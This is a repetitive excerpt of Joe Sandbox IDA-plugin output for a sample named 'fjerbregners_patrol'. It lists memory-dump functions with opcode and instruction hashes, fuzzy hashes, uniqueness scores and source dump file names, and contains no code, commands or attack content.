                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 28be50e18f7c6a96c4642090142a3b1f35eb08c3651d904e1aaf7ae70e460030
                                                                                                                                                                                            • Instruction ID: 5709f54bb6ed10167223acf979aca1c2d4fa9b291adaf648a10f2b73ab2cbbfc
                                                                                                                                                                                            • Opcode Fuzzy Hash: 28be50e18f7c6a96c4642090142a3b1f35eb08c3651d904e1aaf7ae70e460030
                                                                                                                                                                                            • Instruction Fuzzy Hash: 313167B1A083458FDB05CF29D880A4ABBE9FF99760F05056AF854DB360DB31DD14CBA2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D21B9C Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a08c0b53574f70d08f681d049f7ed257369b3d54af9773c69b5c6d963f6f5763
                                                                                                                                                                                            • Instruction ID: 424fd0c480b3e80fa74cc0f9e15c641276ead2f0c485e51688299ad7a1760def
                                                                                                                                                                                            • Opcode Fuzzy Hash: a08c0b53574f70d08f681d049f7ed257369b3d54af9773c69b5c6d963f6f5763
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2831067EA107109FDB01EF59C4C179ABBB4EF29754F458069ED44EB200E774DA4ACB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D999D6 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: bbc8603acb21b7ceda6bd8f495283319e4b516e111f1e5407e9f25c859cc14a5
                                                                                                                                                                                            • Instruction ID: d3d3dec860a165386a2466cd8c6b0e8b1dc81c69669e26ca4eb894eaad031018
                                                                                                                                                                                            • Opcode Fuzzy Hash: bbc8603acb21b7ceda6bd8f495283319e4b516e111f1e5407e9f25c859cc14a5
                                                                                                                                                                                            • Instruction Fuzzy Hash: D731F371A10B818FE314DF2AC580756BBE5FFC5724F58CA2DD4AA87290DB30D846CB51
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D2D450 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: e65aa4d50ff3b75e3dbc87a0276e3a09fdeef0bc07fae01901cfdf91cd45b0b6
                                                                                                                                                                                            • Instruction ID: 51fcc6596cd7186a931a83eb872c3128dcb3f6978d66be505804f0982ca53afc
                                                                                                                                                                                            • Opcode Fuzzy Hash: e65aa4d50ff3b75e3dbc87a0276e3a09fdeef0bc07fae01901cfdf91cd45b0b6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7621DEB29553009FD712EF28C900B0A7BE8AB45A68F400829B564D7A94DB70D905CBB2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D03AF6 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ef55ba601f6abc91ebf0191ab99a85331938960eab05968187623391289dec8a
                                                                                                                                                                                            • Instruction ID: b65e9bb41e629107597463ed672153806cf822ff90c1250f4167e56b54e4a13b
                                                                                                                                                                                            • Opcode Fuzzy Hash: ef55ba601f6abc91ebf0191ab99a85331938960eab05968187623391289dec8a
                                                                                                                                                                                            • Instruction Fuzzy Hash: E8219179241780CFE316CB2EC490B6173E8FB41F59F484496E8C6C7A51DB39DC82CA20
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D1F24A Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 3a330ed7ea655d71dd4bed34469b5c9d3971825b19a448a40de0f01e8c52a13d
                                                                                                                                                                                            • Instruction ID: 658ab2906ac4c10ba46a00d560b156569b03f8a98fa4474fe2b221f559b79c8b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a330ed7ea655d71dd4bed34469b5c9d3971825b19a448a40de0f01e8c52a13d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4921DBB5A013009FD719CF64D440B56BBE9FF85361F05836EE40ACB6A1EBB0ED00CAA4
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D29580 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a9b4b135c3ac17e81a990aae0ca3ad40db8dc1d1fe2a24b38502daa8b58fbbf5
                                                                                                                                                                                            • Instruction ID: 0e1a0d795bae96e5b462717d320aa885469dbfa0a5c890a2dcabac7643186479
                                                                                                                                                                                            • Opcode Fuzzy Hash: a9b4b135c3ac17e81a990aae0ca3ad40db8dc1d1fe2a24b38502daa8b58fbbf5
                                                                                                                                                                                            • Instruction Fuzzy Hash: F9210834604700DFEB359B25C850B063FE6AF00A78F580619E4EBC6AD5DB31E8A1CFA1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DCB781 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a74cad2e29d168b411be02868ceb5dceb84830ab7fe150743fd230f8312ce3c2
                                                                                                                                                                                            • Instruction ID: 08d4a44e5314e36f4170f8a096eb864e19b83e37a82a413d6cd2feaf38260a1d
                                                                                                                                                                                            • Opcode Fuzzy Hash: a74cad2e29d168b411be02868ceb5dceb84830ab7fe150743fd230f8312ce3c2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9021FF7AA50291EFEB118F59C884F5ABBB8FF45B94F098065E8049B240D734DD00CFA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DAD430 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 575a3526d1c358682353366e68caeade6c1654175c3d3c744dba7750c30e3068
                                                                                                                                                                                            • Instruction ID: b3570fb8c2e9788e8b5d751f70b7a977d9ddb642823882f1a74fb4fb58f17bff
                                                                                                                                                                                            • Opcode Fuzzy Hash: 575a3526d1c358682353366e68caeade6c1654175c3d3c744dba7750c30e3068
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D219F76600705AFDB22DF6DC950F9BB7B9EF85B60F004429E91987624D670E905CB60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CEFAEC Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 83bdbddc7f081f116cfd5a5e5560267fcc03b69956c6229cc2f9c88a219cf52a
                                                                                                                                                                                            • Instruction ID: 6c00a7e118602a2b385300757d8237608aeca7d31d4aaa37a7d945ce212e4ce9
                                                                                                                                                                                            • Opcode Fuzzy Hash: 83bdbddc7f081f116cfd5a5e5560267fcc03b69956c6229cc2f9c88a219cf52a
                                                                                                                                                                                            • Instruction Fuzzy Hash: D3213276900721DFC704CF61C490669F3F5FF44392F1A82A9C8A9DB650EF70AA00CB80
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CFB950 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 9fcb6d17809365b2a68dbc15fa21bc5c73d2e22a0f54297b0aa728f55a023f44
                                                                                                                                                                                            • Instruction ID: 5621be4c1c9b0ce3f5ce6bb2b6c15bc24d193fadcb3061f019ba9b5a6bb06b36
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fcb6d17809365b2a68dbc15fa21bc5c73d2e22a0f54297b0aa728f55a023f44
                                                                                                                                                                                            • Instruction Fuzzy Hash: B321CD7AA05B80DBE7168B59D850B1573A8FF88B90F1800A5FC50CBB91EB36DE11CB61
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CEB705 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 38cbefa3801df1deace88c7f307c240c771b4e35d188ad96df8e74f0eec63a12
                                                                                                                                                                                            • Instruction ID: 1e8025c23aaceebfb1b14c25de7c137546ae827e95635020b4edd8bb0179c73d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 38cbefa3801df1deace88c7f307c240c771b4e35d188ad96df8e74f0eec63a12
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C215772922A00DFC326EF68C941F59BBF5FB08719F15456CE006D6A61CB34E841DF64
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D114C9 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 6e00257dc14b4a21706c11d80b94c86bd4fe7158da46d6ffa4b94db1d511f37e
                                                                                                                                                                                            • Instruction ID: 7d6ebc55cea52e54ce2ffcf7dd3246f48bb20297fac5c2c6527262a140e52587
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e00257dc14b4a21706c11d80b94c86bd4fe7158da46d6ffa4b94db1d511f37e
                                                                                                                                                                                            • Instruction Fuzzy Hash: BD21F075A01791DBFB028BA8C940B0577E9FF44F80F0900A1FD808BA96EB39DC50CB61
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D7FB45 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 9f62c5d32188356a5331e40ae7faabf1a4ecf0507d1c9b56ccc30cbeedbce2b8
                                                                                                                                                                                            • Instruction ID: 3e67e6a66b3bcbfc3ced6edba3236b91e0b607f49c48f73a7be821f6026cbea7
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f62c5d32188356a5331e40ae7faabf1a4ecf0507d1c9b56ccc30cbeedbce2b8
                                                                                                                                                                                            • Instruction Fuzzy Hash: B411A2B6A00B12ABD6224E78DC68711B7BCBF05A74F194726A8709B5D0C765EC91CAE0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CE7B7D Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: e5554a53121a7bc9ce97cefb5da18c446f4e049c31929b47aad121079293664f
                                                                                                                                                                                            • Instruction ID: b77b6046516a2a595a0cb7590387d4ca74574fb45805cee2d5e302746fbdeecc
                                                                                                                                                                                            • Opcode Fuzzy Hash: e5554a53121a7bc9ce97cefb5da18c446f4e049c31929b47aad121079293664f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 641138B5901700ABCB209F28C451EAABBF5EF14B50F18046AF485D7680EF35DC41C7A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D19938 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a612bbf784feb212866b1a0590369a02d4dcf82f1c94ffcec620604e6849556b
                                                                                                                                                                                            • Instruction ID: 2ac9d86be3c223cc5dea91a90f8ff2f8323204cc496acb914d1688195a802797
                                                                                                                                                                                            • Opcode Fuzzy Hash: a612bbf784feb212866b1a0590369a02d4dcf82f1c94ffcec620604e6849556b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 68219DB2A01205DFD7418F14D500945FBAAFF82759B59D1E9E44A8B210D731DD52CBD0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF3640 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: cb0ef055b0d8ee00f86ff5fb7a5123a78acd46d9a513f6d733d4f34144e6d851
                                                                                                                                                                                            • Instruction ID: 1a0d6956b9e294693fa94dc774fb6ae71e2667e1ba845f41fe65224936cd43bc
                                                                                                                                                                                            • Opcode Fuzzy Hash: cb0ef055b0d8ee00f86ff5fb7a5123a78acd46d9a513f6d733d4f34144e6d851
                                                                                                                                                                                            • Instruction Fuzzy Hash: C521C675A016099BEB81DF69C4447EE77B4FF88318F198018D912DB3D0CBBA9989C764
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D7DA40 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3446177414-0
                                                                                                                                                                                            • Opcode ID: c6b75ff1e18cf0b20cd19163671d5ffb5fda606a9aceb9bee8ad1b34ae3600fa
                                                                                                                                                                                            • Instruction ID: e7f3274a30e2bee29bf53d6e2496c1260cd117e83e552220d48c847f69c44d96
                                                                                                                                                                                            • Opcode Fuzzy Hash: c6b75ff1e18cf0b20cd19163671d5ffb5fda606a9aceb9bee8ad1b34ae3600fa
                                                                                                                                                                                            • Instruction Fuzzy Hash: D22147B6A15741CFD746EF28C140614BBF2FF49765B29C2AED0469BB94D732D842CB10
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D2BBC0 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c5c9be6e376141eaf8e70905db7356036176047ebb84d0f33fc15c1cd96d57c2
                                                                                                                                                                                            • Instruction ID: ae31e03b454c9be7b3461cf50820f5fa4fc25a51ce29cba37819f5249239e4b3
                                                                                                                                                                                            • Opcode Fuzzy Hash: c5c9be6e376141eaf8e70905db7356036176047ebb84d0f33fc15c1cd96d57c2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5911E636B087988BE7028F69C850B1577ADEF84B98F5800A1FD60CBB81EE75DC11D6A1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CE91F0 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 51fe77bcb90d9596cf813c31733d1e411e8eb17ffd6f575ec93e47f6c69c3e0f
                                                                                                                                                                                            • Instruction ID: ead2d2afa3f3b68f751e4dfe3cc5603d6db77cb08d437f0c43c801eb6c765268
                                                                                                                                                                                            • Opcode Fuzzy Hash: 51fe77bcb90d9596cf813c31733d1e411e8eb17ffd6f575ec93e47f6c69c3e0f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1211C4BB432640EAD319AF55DA40A72BBF8EB98B80F100069E540E7750E734DD43DB64
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

